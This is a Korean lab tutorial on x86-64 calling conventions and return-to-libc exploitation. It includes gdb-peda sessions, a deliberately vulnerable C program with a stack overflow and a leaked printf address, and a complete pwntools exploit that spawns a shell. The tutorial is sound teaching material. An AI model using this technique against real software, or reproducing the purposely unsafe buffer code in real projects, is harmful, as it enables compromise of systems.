Excuse the ads! We need some help to keep our site up.
|
int a,b,c,d; int ret; ret = function(a,b,c,d); |
mov rcx,d mov rdx,c mov rsi,b mov rdi,a call function mov ret,eax |
//gcc -o test test.c
#include <stdlib.h>
#include <stdio.h>
void vuln(int a,int b,int c,int d){
printf("%d, %d, %d, %d",a,b,c,d);
}
void main(){
vuln(1,2,3,4);
} |
lazenca0x0@ubuntu:~/Exploit/RTL$ gdb -q ./test Reading symbols from ./test...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x000000000040055d <+0>: push rbp 0x000000000040055e <+1>: mov rbp,rsp 0x0000000000400561 <+4>: mov ecx,0x4 0x0000000000400566 <+9>: mov edx,0x3 0x000000000040056b <+14>: mov esi,0x2 0x0000000000400570 <+19>: mov edi,0x1 0x0000000000400575 <+24>: call 0x400526 <vuln> 0x000000000040057a <+29>: nop 0x000000000040057b <+30>: pop rbp 0x000000000040057c <+31>: ret End of assembler dump. gdb-peda$ b *0x0000000000400575 Breakpoint 1 at 0x400575 gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/RTL/test Breakpoint 1, 0x0000000000400575 in main () gdb-peda$ i r rax 0x40055d 0x40055d rbx 0x0 0x0 rcx 0x4 0x4 rdx 0x3 0x3 rsi 0x2 0x2 rdi 0x1 0x1 rbp 0x7fffffffe460 0x7fffffffe460 rsp 0x7fffffffe460 0x7fffffffe460 r8 0x4005f0 0x4005f0 r9 0x7ffff7de7ab0 0x7ffff7de7ab0 r10 0x846 0x846 r11 0x7ffff7a2d740 0x7ffff7a2d740 r12 0x400430 0x400430 r13 0x7fffffffe540 0x7fffffffe540 r14 0x0 0x0 r15 0x0 0x0 rip 0x400575 0x400575 <main+24> eflags 0x246 [ PF ZF IF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gdb-peda$ |
그리고 vuln() 함수는 printf() 함수에 인자를 전달 하기 위해 인자를 재배치 합니다.
printf() 함수의 첫번째 인자는 "%d, %d, %d, %d" 입니다.
gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400526 <+0>: push rbp 0x0000000000400527 <+1>: mov rbp,rsp 0x000000000040052a <+4>: sub rsp,0x10 0x000000000040052e <+8>: mov DWORD PTR [rbp-0x4],edi 0x0000000000400531 <+11>: mov DWORD PTR [rbp-0x8],esi 0x0000000000400534 <+14>: mov DWORD PTR [rbp-0xc],edx 0x0000000000400537 <+17>: mov DWORD PTR [rbp-0x10],ecx 0x000000000040053a <+20>: mov esi,DWORD PTR [rbp-0x10] 0x000000000040053d <+23>: mov ecx,DWORD PTR [rbp-0xc] 0x0000000000400540 <+26>: mov edx,DWORD PTR [rbp-0x8] 0x0000000000400543 <+29>: mov eax,DWORD PTR [rbp-0x4] 0x0000000000400546 <+32>: mov r8d,esi 0x0000000000400549 <+35>: mov esi,eax 0x000000000040054b <+37>: mov edi,0x400604 0x0000000000400550 <+42>: mov eax,0x0 0x0000000000400555 <+47>: call 0x400400 <printf@plt> 0x000000000040055a <+52>: nop 0x000000000040055b <+53>: leave 0x000000000040055c <+54>: ret End of assembler dump. gdb-peda$ b *0x0000000000400555 Breakpoint 2 at 0x400555 gdb-peda$ |
|
gdb-peda$ c Continuing. Breakpoint 2, 0x0000000000400555 in vuln () gdb-peda$ i r rax 0x0 0x0 rbx 0x0 0x0 rcx 0x3 0x3 rdx 0x2 0x2 rsi 0x1 0x1 rdi 0x400604 0x400604 rbp 0x7fffffffe450 0x7fffffffe450 rsp 0x7fffffffe440 0x7fffffffe440 r8 0x4 0x4 r9 0x7ffff7de7ab0 0x7ffff7de7ab0 r10 0x846 0x846 r11 0x7ffff7a2d740 0x7ffff7a2d740 r12 0x400430 0x400430 r13 0x7fffffffe540 0x7fffffffe540 r14 0x0 0x0 r15 0x0 0x0 rip 0x400555 0x400555 <vuln+47> eflags 0x202 [ IF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gdb-peda$ x/s 0x400604 0x400604: "%d, %d, %d, %d" gdb-peda$ |
|
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
void vuln(){
char buf[50] = "";
void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
printf("Printf() address : %p\n",printf_addr);
read(0, buf, 100);
}
void main(){
vuln();
} |
lazenca0x0@ubuntu:~/Exploit/RTL$ gcc -fno-stack-protector -o ret2libc ret2libc.c -ldl |
lazenca0x0@ubuntu:~/Exploit/RTL$ gdb -q ./ret2libc Reading symbols from ./ret2libc...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400676 <+0>: push rbp 0x0000000000400677 <+1>: mov rbp,rsp 0x000000000040067a <+4>: sub rsp,0x40 0x000000000040067e <+8>: mov QWORD PTR [rbp-0x40],0x0 0x0000000000400686 <+16>: lea rdx,[rbp-0x38] 0x000000000040068a <+20>: mov eax,0x0 0x000000000040068f <+25>: mov ecx,0x5 0x0000000000400694 <+30>: mov rdi,rdx 0x0000000000400697 <+33>: rep stos QWORD PTR es:[rdi],rax 0x000000000040069a <+36>: mov rdx,rdi 0x000000000040069d <+39>: mov WORD PTR [rdx],ax 0x00000000004006a0 <+42>: add rdx,0x2 0x00000000004006a4 <+46>: mov esi,0x400784 0x00000000004006a9 <+51>: mov rdi,0xffffffffffffffff 0x00000000004006b0 <+58>: call 0x400560 <dlsym@plt> 0x00000000004006b5 <+63>: mov QWORD PTR [rbp-0x8],rax 0x00000000004006b9 <+67>: mov rax,QWORD PTR [rbp-0x8] 0x00000000004006bd <+71>: mov rsi,rax 0x00000000004006c0 <+74>: mov edi,0x40078b 0x00000000004006c5 <+79>: mov eax,0x0 0x00000000004006ca <+84>: call 0x400530 <printf@plt> 0x00000000004006cf <+89>: lea rax,[rbp-0x40] 0x00000000004006d3 <+93>: mov edx,0x64 0x00000000004006d8 <+98>: mov rsi,rax 0x00000000004006db <+101>: mov edi,0x0 0x00000000004006e0 <+106>: call 0x400540 <read@plt> 0x00000000004006e5 <+111>: nop 0x00000000004006e6 <+112>: leave 0x00000000004006e7 <+113>: ret End of assembler dump. gdb-peda$ b *0x400676 Breakpoint 1 at 0x400676 gdb-peda$ b *0x4006e0 Breakpoint 2 at 0x4006e0 gdb-peda$ b *0x4006e7 Breakpoint 3 at 0x4006e7 gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/RTL/ret2libc Breakpoint 1, 0x0000000000400676 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe498 0x7fffffffe498 gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x00000000004006f6 gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004006e8 <+0>: push rbp 0x00000000004006e9 <+1>: mov rbp,rsp 0x00000000004006ec <+4>: mov eax,0x0 0x00000000004006f1 <+9>: call 0x400676 <vuln> 0x00000000004006f6 <+14>: nop 0x00000000004006f7 <+15>: pop rbp 0x00000000004006f8 <+16>: ret End of assembler dump. gdb-peda$ |
gdb-peda$ c Continuing. Printf() address : 0x7ffff785e800 Breakpoint 2, 0x00000000004006e0 in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe450 0x7fffffffe450 gdb-peda$ p/d 0x7fffffffe498 - 0x7fffffffe450 $1 = 72 gdb-peda$ c Continuing. AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJ |
0x7fffffffe498 영역에 0x4a4a4a4a4a4a4a4a(JJJJJJJJ)가 저장되었습니다.
Breakpoint 3, 0x00000000004006e7 in vuln () gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x4a4a4a4a4a4a4a4a gdb-peda$ x/s 0x7fffffffe498 0x7fffffffe498: "JJJJJJJJ\n\a@" gdb-peda$ |
gdb-peda$ print system
$2 = {<text variable, no debug info>} 0x7ffff784e390 <__libc_system>
gdb-peda$ info proc map
process 9812
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /home/lazenca0x0/Exploit/RTL/ret2libc
0x600000 0x601000 0x1000 0x0 /home/lazenca0x0/Exploit/RTL/ret2libc
0x601000 0x602000 0x1000 0x1000 /home/lazenca0x0/Exploit/RTL/ret2libc
0x602000 0x623000 0x21000 0x0 [heap]
0x7ffff7809000 0x7ffff79c9000 0x1c0000 0x0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff79c9000 0x7ffff7bc9000 0x200000 0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7bc9000 0x7ffff7bcd000 0x4000 0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7bcd000 0x7ffff7bcf000 0x2000 0x1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ffff7bcf000 0x7ffff7bd3000 0x4000 0x0
0x7ffff7bd3000 0x7ffff7bd6000 0x3000 0x0 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ffff7bd6000 0x7ffff7dd5000 0x1ff000 0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ffff7dd5000 0x7ffff7dd6000 0x1000 0x2000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ffff7dd6000 0x7ffff7dd7000 0x1000 0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so
0x7ffff7dd7000 0x7ffff7dfd000 0x26000 0x0 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7fdc000 0x7ffff7fe0000 0x4000 0x0
0x7ffff7ff8000 0x7ffff7ffa000 0x2000 0x0 [vvar]
0x7ffff7ffa000 0x7ffff7ffc000 0x2000 0x0 [vdso]
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x25000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x26000 /lib/x86_64-linux-gnu/ld-2.23.so
0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
gdb-peda$ p/x 0x7ffff785e800 - 0x7ffff7809000
$2 = 0x55800
gdb-peda$ p/x 0x7ffff784e390 - 0x7ffff7809000
$3 = 0x45390
gdb-peda$ |
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7995d57 --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$ p/x 0x7ffff7995d57 - 0x7ffff7809000
$4 = 0x18cd57
gdb-peda$ |
gdb-peda$ ropsearch "pop rdi; ret" Searching for ROP gadget: 'pop rdi; ret' in: binary ranges 0x00400763 : (b'5fc3') pop rdi; ret gdb-peda$ |
from pwn import *
p = process('./ret2libc')
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
libcBase = stackAddr - 0x55800
sysAddr = libcBase + 0x45390
binsh = libcBase + 0x18cd57
poprdi = 0x400763
print hex(libcBase)
print hex(sysAddr)
print hex(binsh)
print hex(poprdi)
exploit = "A" * (80 - len(p64(sysAddr)))
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(sysAddr)
p.send(exploit)
p.interactive() |
lazenca0x0@ubuntu:~/Exploit/RTL$ python Exploit.py [+] Starting local process './ret2libc': pid 10291 0x7f61413b6000 0x7f61413fb390 0x7f6141542d57 0x400763 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |